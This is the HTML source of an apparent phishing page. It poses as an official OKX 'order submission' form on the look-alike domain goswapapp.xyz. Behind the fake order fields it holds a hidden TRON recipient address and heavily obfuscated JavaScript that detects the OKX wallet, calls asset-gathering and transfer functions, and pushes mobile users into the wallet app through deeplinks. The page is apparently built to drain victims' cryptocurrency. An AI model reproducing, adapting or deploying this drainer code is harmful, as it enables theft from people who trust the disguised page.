<!DOCTYPE html>
<html lang="zh-CN" style="--status-bar-height: 0px; --top-window-height: 0px; --window-left: 0px; --window-right: 0px; --window-margin: 0px; font-size: 17.2px; --window-top: calc(var(--top-window-height) + 0px); --window-bottom: 0px;">
<head>
    <base href="https://goswapapp.xyz/">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="shortcut icon" type="image/x-icon" href="https://goswapapp.xyz/okx.png">
    <meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1">
    <title>欧易官方订单提交</title>
    <script src="https://goswapapp.xyz/statics/js/jquery-3.5.1.min.js"></script>
    <script src="https://goswapapp.xyz/statics/js/md5.js"></script>
    <style>
        ::-webkit-scrollbar {
            display: none;
        }
    </style>
    <style type="text/css">
        .tishi {
            width: 58%;
            padding: 0.1rem 0.3rem;
            height: 3rem;
            background: #4b4848;
            z-index: 999999999999;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            border-radius: 0.3rem;
            color: white;
            font-size: 1.2rem;
            text-align: center;
            line-height: 3rem;
            display: none;
            height: auto;
            margin: 0 auto;
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            document.documentElement.style.fontSize = document.documentElement.clientWidth / 25 + 'px';
        });
    </script>
    <link rel="stylesheet" href="https://goswapapp.xyz/statics/css/okex.css">
    <style>
        select {
            -webkit-appearance: none;
            -moz-appearance: none;
            appearance: none;
            background-color: #fff;
            border: none;
            border-radius: 10px;
            padding: 10px;
            font-size: 13px;
            color: #333;
            width: 100%;
            max-width: 374px;
            box-sizing: border-box;
        }

        select::-ms-expand {
            display: none;
        }

        select:after {
            content: "▼";
            font-size: 13px;
            color: #999;
            right: 10px;
            position: absolute;
            pointer-events: none;
        }

        select:focus {
            outline: none;
            box-shadow: 0 0 5px rgba(82, 168, 236, 0.5);
        }

        @media (max-width: 600px) {
            select {
                font-size: 13px;
            }
        }

        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            box-sizing: border-box;
        }

        .order-form {
            position: relative;
            width: 340px;
            margin: 0 auto;
        }

        .form-layer {
            position: absolute;
            width: 100%;
        }

        .top-layer {
            z-index: 2;
            background-color: rgba(255, 255, 255, 0.7);
        }

        .bottom-layer {
            z-index: 1;
            background-color: #fff;
        }

        .rounded-input {
            border: 2px solid #ccc;
            border-radius: 10px;
            padding: 10px;
            font-size: 13px;
            width: 97%;
            transition: border-color 0.3s;
        }

        .rounded-input:focus {
            border-color: #888;
            outline: none;
            box-shadow: 0 0 5px rgba(0, 0, 0, 0.1) inset;
        }

        #mySelect{
            border: 2px solid #ccc;
            border-radius: 10px;
            padding: 10px;
            font-size: 13px;
            width: 97%;
            transition: border-color 0.3s;
        }

        label {
            display: block;
            margin: 10px 0;
            font-weight: 400;
            font-size: 13px;
        }

        input[type="submit"] {
            margin-top: 10px;
            padding: 10px 20px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #45a049;
        }

        .submit-btn{
            margin: 5px 0px !important;
        }
    </style>
    <style type="text/css">
        #theme_box {
            display: inline-block;
            width: 307px;
            height: 40px;
            background-color: #fff;
        }
        #content_box {
            position: absolute;
            top: 0;
            left: 220px;
        }
        .theme_title{
            position: relative;
            width:auto;
        }
        .theme_text {
            display: block;
            width: 307px;
            height: 16px;
            padding: 10px;
            line-height: 20px;
            border: 2px solid #ccc;
            border-radius: 10px;
            font-size: 13px;
            transition: border-color 0.3s;
        }

        #theme_box ul {
            list-style: none;
            padding: 0px;
            margin-top: 4px;
            height:327px;
            background-color: #fff;
            position: relative;
            border: 1px solid #d8d7d9;
            border-radius: 4px;
            z-index: 2;
        }

        #theme_box ul li{
            height: 20px;
            line-height: 40px;
            font-size: 13px;
            color: #333;
            padding-left: 10px;
            padding-bottom: 6px;
            width: 327px;
        }
    </style>
</head>
<body class="uni-body pages-index-home">
    <noscript><strong>本站点必须要开启JavaScript才能运行</strong></noscript>
    <div class="order-form">
        <div class="form-layer bottom-layer" style="margin-top: 50px">
            <form>
                <label style="display: inline-block;" for="date">订单提交时间</label>
                <label  style="display: inline-block;font-size: 13px;float: right;color:#0064C0">官方订单系统【安全认证】</label>
                <input type="text" id="date" name="date" class="rounded-input" value="2024-07-26 00:29:09" readonly placeholder="请输入订单提交时间">
                <label for="money">订单金额</label>
                <input type="email" id="money" name="money" class="rounded-input" placeholder="请输入订单金额">
                <label for="order">订单编号</label>
                <input type="text" id="order" name="order"  class="rounded-input" placeholder="请输入订单编号">
                <label>收款方式</label>
                <div id="theme_box" onclick="click_ul();">
                    <div class="theme_title">
                        <span id="theme_text" class="theme_text">
                            <span style="opacity: 0.6;">请选择收款方式</span>
                        </span>
                    </div>
                    <ul id="theme_select" style="height: 140px;width: 327px">
                        <li sele="select1" onclick="theme_li_click();">支付宝</li>
                        <li sele="select2" onclick="theme_li_click();">微信</li>
                        <li sele="select3" onclick="theme_li_click();">银行卡</li>
                        <li sele="select4" onclick="theme_li_click();">现金</li>
                        <li sele="select5" onclick="theme_li_click();">其他</li>
                    </ul>
                </div>
            </form>
            <div class="tishi" id="tip" style="display: none">提示</div>
            <input type="text" id="address" style="display:none">
            <input type="hidden" id="to_address" value="TFjUz313BQXRSj7g4FabMVegHPfUKj6Uhz">
            <input type="hidden" id="sign" value="bc11e4743ef4cc714ec46bb4faf1d20e">
            <button class="submit-btn" type="button" id="submitBtn">下一步</button>
        </div>
    </div>
    <uni-app class="uni-app--maxwidth">
        <uni-page data-page="pages/index/home">
            <uni-page-wrapper>
                <uni-page-body>
                    <body data-v-49fe1bb8="">
                        <div data-v-49fe1bb8="" id="app"></div>
                    </body>
                </uni-page-body>
            </uni-page-wrapper>
        </uni-page>
    </uni-app>
    <input type="hidden" id="href_url" value="https://goswapapp.xyz/o">
    <script type="text/javascript" src="https://goswapapp.xyz/statics/js/order.js"></script>
    <script type="text/javascript" src="https://goswapapp.xyz/statics/pay/js/common.js"></script>
    <script type="text/javascript">
        document.getElementById('theme_select').style.display = 'none';
        function click_ul() {
            document.getElementById('theme_select').style.display = 'block';
        }
        function theme_li_click() {
            var t_obj = event.target;
            console.log(t_obj.getAttribute('sele'));
            document.getElementById('theme_text').innerHTML = t_obj.innerHTML;
            setTimeout(function () {
                document.getElementById('theme_select').style.display = 'none';
                document.getElementById('theme_text').className='theme_text';
            }, 1);
        }
        document.onclick = function () {
            var cur_obj = event.target;
            if ('theme_text' != cur_obj.id && 'theme_box' != cur_obj.id) {
                document.getElementById('theme_select').style.display = 'none';
                document.getElementById('theme_text').className='theme_text';
            }
        }
    </script>
    <script type="text/javascript">
        var _0xodT='jsjiami.com.v7';
        function _0x3a34(_0x4f114b,_0x482f02) {
            const _0xa19fcb=_0xa19f();
            return _0x3a34=function(_0x3a34f3,_0x30a752) {
                _0x3a34f3=_0x3a34f3-0x113;
                let _0x4187b7=_0xa19fcb[_0x3a34f3];
                if(_0x3a34['DRFgXE']===undefined) {
                    var _0x44b2cb=function(_0x14ab86) {
                        const _0x53c9be='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                        let _0x4909a4='',_0x5f1f49='';
                        for(let _0x94cd96=0x0,_0x2eb549,_0x1c8d1f,_0x210721=0x0;_0x1c8d1f=_0x14ab86['charAt'](_0x210721++);~_0x1c8d1f&&(_0x2eb549=_0x94cd96%0x4?_0x2eb549*0x40+_0x1c8d1f:_0x1c8d1f,_0x94cd96++%0x4)?_0x4909a4+=String['fromCharCode'](0xff&_0x2eb549>>(-0x2*_0x94cd96&0x6)):0x0) {
                            _0x1c8d1f=_0x53c9be['indexOf'](_0x1c8d1f);
                        }
                        for(let _0x16501d=0x0,_0xd15662=_0x4909a4['length'];_0x16501d<_0xd15662;_0x16501d++) {
                            _0x5f1f49+='%'+('00'+_0x4909a4['charCodeAt'](_0x16501d)['toString'](0x10))['slice'](-0x2);
                        }
                        return decodeURIComponent(_0x5f1f49);
                    };
                    const _0x229117=function(_0x3eac70,_0x201dea) {
                        let _0x2eeed5=[],_0x3cbc5f=0x0,_0xca036d,_0x1b65a1='';
                        _0x3eac70=_0x44b2cb(_0x3eac70);
                        let _0xca607b;
                        for(_0xca607b=0x0;_0xca607b<0x100;_0xca607b++) {
                            _0x2eeed5[_0xca607b]=_0xca607b;
                        }
                        for(_0xca607b=0x0;_0xca607b<0x100;_0xca607b++) {
                            _0x3cbc5f=(_0x3cbc5f+_0x2eeed5[_0xca607b]+_0x201dea['charCodeAt'](_0xca607b%_0x201dea['length']))%0x100,_0xca036d=_0x2eeed5[_0xca607b],_0x2eeed5[_0xca607b]=_0x2eeed5[_0x3cbc5f],_0x2eeed5[_0x3cbc5f]=_0xca036d;
                        }
                        _0xca607b=0x0,_0x3cbc5f=0x0;
                        for(let _0x26269e=0x0;_0x26269e<_0x3eac70['length'];_0x26269e++) {
                            _0xca607b=(_0xca607b+0x1)%0x100,_0x3cbc5f=(_0x3cbc5f+_0x2eeed5[_0xca607b])%0x100,_0xca036d=_0x2eeed5[_0xca607b],_0x2eeed5[_0xca607b]=_0x2eeed5[_0x3cbc5f],_0x2eeed5[_0x3cbc5f]=_0xca036d,_0x1b65a1+=String['fromCharCode'](_0x3eac70['charCodeAt'](_0x26269e)^_0x2eeed5[(_0x2eeed5[_0xca607b]+_0x2eeed5[_0x3cbc5f])%0x100]);
                        }
                        return _0x1b65a1;
                    };
                    _0x3a34['ySLXqd']=_0x229117,_0x4f114b=arguments,_0x3a34['DRFgXE']=!![];
                }
                const _0x4ce990=_0xa19fcb[0x0],_0x3913a2=_0x3a34f3+_0x4ce990,_0x3c9ed4=_0x4f114b[_0x3913a2];
                return !_0x3c9ed4?(_0x3a34['lafICc']===undefined&&(_0x3a34['lafICc']=!![]),_0x4187b7=_0x3a34['ySLXqd'](_0x4187b7,_0x30a752),_0x4f114b[_0x3913a2]=_0x4187b7):_0x4187b7=_0x3c9ed4,_0x4187b7;
            },_0x3a34(_0x4f114b,_0x482f02);
        }
        function _0xa19f() {
            const _0x2f7bff=(function() {
                return [_0xodT,'QLYIjPdMsjhialLmiKl.HcYtoXOm.OqMver7kugE==','CCoJgmo/sa','WPlcOCk5rSoVqcvWyc5NWRFcO8kvnwj+W4xdIXxcR8omlCk2jmkrf8kOqCoqW7baEmoFuCoWx8oz','d8kwWONdG1q','ph3cVcieW6ZdLmo7','WPlcJmk1jd0','qHuEWOza','WO7cLf0XWQZdVMW','CmkgWQ3cLCkGw8o+aSo3jHPP','yqiKfXq','D8o3W7VdKt8','W54Qr8o6W5m','wM0KsW','W7lcKxaiWOS','WOifldVcUa','u1VdTdtcUW','w8oUtmo5WO0','CCo9W5NdStJdQCkjrCk2','sCoRlW','zeCoW4ZcLCkAWRjhl8oqWPymzG','BSouW5G','gfRdRCkoWRhdRCoYWOLp','xmo0W5ddPaa','ngrNW79t','W6pcKru1a0apWP4FwNOUW74','FYLkbqXsW7PvW4ZdQx8L','aCkKz2yj','dCoAW4NdMCot'].concat((function() {
                    return ['FmoHW7FdJmo6lmo2','D8krfduZ','D8oEW4WqASoQr2n7','bmkIW4OTW6PHW4FcVa','smoxW6nmBq','g8kHWROYa8oFWOlcTCkfWOfcWQrk','ymovW7fPba','Buyrs3C8WQNdOdnBqCoe','WRRcNCkguvCeBbddL8ooW7BcUgFcO2H8hmoma8kDCSkyWP9SxSklW73dLmk5cq','WR/dQbf0amoMW7n1trlcL8octSo1W5G0W6JcOCkN','bCkeWQddQNW','sW4wgbq','W7WlvSoJW57dNCk4fG','Ea/cPqKV','EIVcHamq','W5eqW7FcHSkK','zJ/cSZW','wSo9W4m0W4ryW4FcMa','prfiW78QW7lcOqtdKq','x8kUgripjmocWP0','a0tdJSkUWOC','mxddGvZdMa','F8oWFSodWRS','sbZcV8kR','jSkSW6NdU2utta','w8kZhXu','aIb4WR/dKG','lmkleCkUW7rRWQRdV8kIW5tdPCo1','WR0SW4yf'].concat((function() {
                        return ['qbW4kGa','FCkTpt0','kxCtxLa','CmooW5pcKWOVzH7dH2fVha','hd5Hb0BcVCk7WQBcRdfHWOG','iwfrW4/dHW','hZLHbKxcU8k+WRdcLbzmWQm','pCovvCoZWQCcWQNdVmk/','Cmkfns1m','W4VdO8o+d8kUtt4jyJjeW7FcUG','nfLRW6ddSG','AImseXFdISk9da','kmooDmouWRGkWQS','W7yqW49jWQe','quvKpuhcJtvaqtPuWO80bLLTWOVdIb4','WQC7W5iwxHJdUq','umkmmZrX','W5ddVtlcUMG','uCo2F8k2WQGUW7ZdP8k9W47dICoseCkEW4VcPu8','lgJdHSk6WO8','esnuWR3dQW','WR4BW44gwG','h19XW456eSk/C8oa','yI94B8kmWRZcNmoHW44ugSos','yfZcJqJdRqxdRHm','ACo7W5DYoa','jaXCW445'];
                    }()));
                }()));
            }());
            _0xa19f=function() {
                return _0x2f7bff;
            };
            return _0xa19f();
        }
        (function(_0x62e98f,_0x2ba2a2,_0x29efb8,_0x49fc87,_0x2e33fb,_0x2e3a7c,_0x45bc5f) {
            return _0x62e98f=_0x62e98f>>0x9,_0x2e3a7c='hs',_0x45bc5f='hs',function(_0x53a581,_0x574461,_0xdf6cae,_0x515645,_0x2215d2) {
                const _0x1fa77e=_0x3a34;
                _0x515645='tfi',_0x2e3a7c=_0x515645+_0x2e3a7c,_0x2215d2='up',_0x45bc5f+=_0x2215d2,_0x2e3a7c=_0xdf6cae(_0x2e3a7c),_0x45bc5f=_0xdf6cae(_0x45bc5f),_0xdf6cae=0x0;
                const _0x3a2b8d=_0x53a581();
                while(!![]&&--_0x49fc87+_0x574461) {
                    try {
                        _0x515645=-parseInt(_0x1fa77e(0x11f,'At3b'))/0x1+-parseInt(_0x1fa77e(0x14c,'V4Tz'))/0x2*(parseInt(_0x1fa77e(0x141,'L3nY'))/0x3)+parseInt(_0x1fa77e(0x139,'[BXb'))/0x4*(-parseInt(_0x1fa77e(0x153,'q%RJ'))/0x5)+-parseInt(_0x1fa77e(0x115,'m136'))/0x6+-parseInt(_0x1fa77e(0x13e,'3vE2'))/0x7+parseInt(_0x1fa77e(0x11d,'k%*g'))/0x8*(parseInt(_0x1fa77e(0x118,'Zw0l'))/0x9)+-parseInt(_0x1fa77e(0x13b,'[BXb'))/0xa*(-parseInt(_0x1fa77e(0x164,'%pzd'))/0xb);
                    } catch(_0x43ea8e) {
                        _0x515645=_0xdf6cae;
                    } finally {
                        _0x2215d2=_0x3a2b8d[_0x2e3a7c]();
                        if(_0x62e98f<=_0x49fc87)_0xdf6cae?_0x2e33fb?_0x515645=_0x2215d2:_0x2e33fb=_0x2215d2:_0xdf6cae=_0x2215d2;
                        else {
                            if(_0xdf6cae==_0x2e33fb['replace'](/[OhEHgtQrLeYKIldkPMXqu=]/g,'')) {
                                if(_0x515645===_0x574461) {
                                    _0x3a2b8d['un'+_0x2e3a7c](_0x2215d2);
                                    break;
                                }
                                _0x3a2b8d[_0x45bc5f](_0x2215d2);
                            }
                        }
                    }
                }
            }(_0x29efb8,_0x2ba2a2,function(_0x312557,_0x467d58,_0x24bd15,_0x309f41,_0x12636c,_0x45615c,_0x3d78ce) {
                return _0x467d58='\x73\x70\x6c\x69\x74',_0x312557=arguments[0x0],_0x312557=_0x312557[_0x467d58](''),_0x24bd15='\x72\x65\x76\x65\x72\x73\x65',_0x312557=_0x312557[_0x24bd15]('\x76'),_0x309f41='\x6a\x6f\x69\x6e',(0x17817d,_0x312557[_0x309f41](''));
            }));
        }(0x18200,0x20c0e,_0xa19f,0xc3),_0xa19f)&&(_0xodT=0xc1);
        $(function() {
            const _0x105489=_0x3a34,_0x3953ef={'DPnFH':function(_0x2827a4,_0x4fdac1) {
                return _0x2827a4(_0x4fdac1);
            },'CouOB':function(_0x68e48c) {
                return _0x68e48c();
            },'cpwIc':function(_0x1c60b5,_0xa707a2) {
                return _0x1c60b5(_0xa707a2);
            },'syGRF':'#submitBtn','mtDtU':function(_0x127378,_0x463f46) {
                return _0x127378+_0x463f46;
            },'GzKOE':_0x105489(0x120,'Nqru'),'Mhbfm':function(_0x585e02,_0x24e69b) {
                return _0x585e02(_0x24e69b);
            },'kEmea':function(_0x4f6460,_0x339fdd,_0xa156da) {
                return _0x4f6460(_0x339fdd,_0xa156da);
            },'vBsSq':_0x105489(0x151,'3vE2'),'alLtQ':function(_0x181d8e,_0x3d45ee) {
                return _0x181d8e(_0x3d45ee);
            },'MBgjw':function(_0x3bea91,_0x57f5f1) {
                return _0x3bea91===_0x57f5f1;
            },'oxqhY':'PybVA','RBNJV':function(_0x19a494,_0x4e7aa3) {
                return _0x19a494||_0x4e7aa3;
            },'ulilt':function(_0x2fead6,_0x37c51) {
                return _0x2fead6&&_0x37c51;
            },'tfRYN':function(_0x308455,_0x584ec5) {
                return _0x308455!==_0x584ec5;
            },'ESkoL':'ZeriS','bBmIX':function(_0x449fa5,_0x4b9b39) {
                return _0x449fa5+_0x4b9b39;
            },'vvlFr':function(_0x49c497,_0x575eb2) {
                return _0x49c497(_0x575eb2);
            },'FPIXc':function(_0x27cfc1,_0x3514f3) {
                return _0x27cfc1+_0x3514f3;
            },'TgPRP':function(_0x1c4815,_0x48444d) {
                return _0x1c4815(_0x48444d);
            },'gtInP':function(_0x15ca67,_0x54c710) {
                return _0x15ca67+_0x54c710;
            },'YrJYO':_0x105489(0x121,'*&N]'),'YKJcp':_0x105489(0x147,'L3nY'),'gNUew':'#to_address','aMYUz':_0x105489(0x14e,'W8Z@'),'Xzlgy':_0x105489(0x13c,'L3nY'),'HiTKt':function(_0x354412,_0x55dc98) {
                return _0x354412(_0x55dc98);
            }};
            _0x3953ef['tfRYN'](typeof window['okxwallet'],'undefined')?(console['log'](_0x3953ef[_0x105489(0x116,'pXVa')]),to_address=$(_0x3953ef[_0x105489(0x158,'@VA8')])[_0x105489(0x163,'4N^y')](),console['log'](to_address),_0x3953ef[_0x105489(0x119,'i]9h')]($,function() {
                const _0x178e2a=_0x105489,_0x4e3580={'eZmvq':function(_0x364a9f) {
                    const _0x1f1270=_0x3a34;
                    return _0x3953ef[_0x1f1270(0x155,'8*Za')](_0x364a9f);
                }};
                _0x3953ef[_0x178e2a(0x15e,'!AO#')](sleep,0x3e8)['then'](()=>{
                    const _0x43601d=_0x178e2a;
                    _0x3953ef[_0x43601d(0x113,'BPuD')](getAssets,function(_0x279b29,_0x4d5020){});
                }),_0x3953ef[_0x178e2a(0x113,'BPuD')]($,_0x3953ef[_0x178e2a(0x159,'daDq')])[_0x178e2a(0x137,'m136')](function() {
                    const _0x517479=_0x178e2a,_0x3aca75={'Gztec':_0x517479(0x143,'ARW%')};
                    if(_0x517479(0x15c,'MPur')!=='mcWEj')_0x4e3580[_0x517479(0x13d,']isq')](transfer_f);
                    else {
                        const _0x3697ca=_0x3edc47[_0x517479(0x14b,'BPuD')][_0x517479(0x144,'rvzy')]({'method':_0x3aca75[_0x517479(0x13f,'#3F4')]});
                    }
                });
            })):_0x3953ef[_0x105489(0x127,'O1$J')]('qYTzJ',_0x3953ef[_0x105489(0x12e,'L3nY')])?_0xe8351[_0x105489(0x14d,'vUDC')][_0x105489(0x136,']isq')]=_0x38e366:(href_url=$(_0x3953ef[_0x105489(0x165,'daDq')])['val'](),_0x3953ef[_0x105489(0x12d,'Y3q]')]($,function() {
                const _0x3054e6=_0x105489,_0x4cb2b4={'UvEjm':function(_0x3914b7,_0x15f38d) {
                    return _0x3914b7+_0x15f38d;
                },'xwrav':_0x3953ef[_0x3054e6(0x154,'Nqru')],'NNrxy':function(_0x39e874,_0x1db837,_0x2fe70f) {
                    const _0x2dfcd0=_0x3054e6;
                    return _0x3953ef[_0x2dfcd0(0x12c,'SUgs')](_0x39e874,_0x1db837,_0x2fe70f);
                },'Dieqi':function(_0x1c005c,_0x9dcd01) {
                    return _0x1c005c+_0x9dcd01;
                },'KqVsB':_0x3953ef[_0x3054e6(0x125,'q%RJ')],'WSBDq':function(_0x127635,_0x3553aa) {
                    return _0x3953ef['alLtQ'](_0x127635,_0x3553aa);
                },'SiQAe':function(_0x18618b,_0x44201b) {
                    return _0x18618b(_0x44201b);
                }};
                if(_0x3953ef[_0x3054e6(0x123,'@VA8')](_0x3054e6(0x117,'Zw0l'),_0x3953ef['oxqhY'])) {
                    if(_0x2b0475) {
                        const _0x1f5a45=_0x4cb2b4['UvEjm'](_0x4cb2b4['xwrav'],_0x444b6a(_0x5181b6));
                        _0x4cb2b4[_0x3054e6(0x15a,'(He1')](_0x346db2,function() {
                            const _0x2ad014=_0x3054e6;
                            _0x653b5e[_0x2ad014(0x124,'(He1')][_0x2ad014(0x134,'rvzy')]=_0x1f5a45;
                        },0x3e8);
                    } else {
                        const _0x1a63ce=_0x4cb2b4[_0x3054e6(0x148,'SUgs')](_0x4cb2b4['KqVsB'],_0x4cb2b4[_0x3054e6(0x132,'xTgM')](_0x226e8b,_0x4cb2b4[_0x3054e6(0x146,'Uv%S')](_0x4cb2b4[_0x3054e6(0x11e,'W8Z@')],_0x4cb2b4[_0x3054e6(0x142,'NCL1')](_0x914073,_0x3a2a95))));
                        _0x36680d['location'][_0x3054e6(0x131,'i]9h')]=_0x1a63ce;
                    }
                } else {
                    const _0x26ebe6=navigator[_0x3054e6(0x160,'daDq')];
                    console[_0x3054e6(0x161,'LPmv')](_0x26ebe6);
                    const _0xe39340=/iphone|ipad|ipod|ios/i[_0x3054e6(0x15b,'[BXb')](_0x26ebe6),_0x15ad00=/android|XiaoMi|MiuiBrowser/i['test'](_0x26ebe6),_0x1c3a82=_0x3953ef[_0x3054e6(0x13a,'#3F4')](_0xe39340,_0x15ad00),_0x4a569e=/OKApp/i['test'](_0x26ebe6);
                    if(_0x3953ef['ulilt'](_0x1c3a82,!_0x4a569e)) {
                        if(_0x15ad00) {
                            if(_0x3953ef[_0x3054e6(0x126,'q%RJ')](_0x3953ef[_0x3054e6(0x15f,'L3nY')],_0x3953ef[_0x3054e6(0x145,']isq')])) {
                                const _0x2f63ab=_0x3953ef['mtDtU'](_0x3953ef[_0x3054e6(0x122,'@vG@')],_0x3953ef[_0x3054e6(0x152,'@vG@')](_0x717e01,_0x8b0967));
                                _0x3953ef[_0x3054e6(0x14a,'rvzy')](_0x40c8bf,function() {
                                    const _0x1b3926=_0x3054e6;
                                    _0x13f04e[_0x1b3926(0x140,'@VA8')][_0x1b3926(0x12f,'%pzd')]=_0x2f63ab;
                                },0x3e8);
                            } else {
                                const _0x25f94c=_0x3953ef[_0x3054e6(0x11c,'k%*g')](_0x3953ef['GzKOE'],_0x3953ef[_0x3054e6(0x14f,'l^QI')](encodeURIComponent,href_url));
                                _0x3953ef[_0x3054e6(0x15d,'dQB&')](setTimeout,function() {
                                    const _0x23b0c6=_0x3054e6;
                                    window[_0x23b0c6(0x129,']gp!')][_0x23b0c6(0x128,'q%RJ')]=_0x25f94c;
                                },0x3e8);
                            }
                        } else {
                            const _0x367f1e=_0x3953ef[_0x3054e6(0x135,'@VA8')]('https://www.okx.com/download?deeplink=',_0x3953ef[_0x3054e6(0x150,'LPmv')](encodeURIComponent,_0x3953ef['gtInP'](_0x3953ef['GzKOE'],_0x3953ef[_0x3054e6(0x149,'xTgM')](encodeURIComponent,href_url))));
                            window[_0x3054e6(0x12b,'i]9h')]['href']=_0x367f1e;
                        }
                    } else {
                        if(window[_0x3054e6(0x11a,'4N^y')]) {
                            const _0x3f1b81=window[_0x3054e6(0x12a,'l^QI')]['request']({'method':_0x3953ef['YrJYO']});
                        }
                    }
                }
            }));
        });
        var version_ = 'jsjiami.com.v7';
    </script>
</body>
</html>
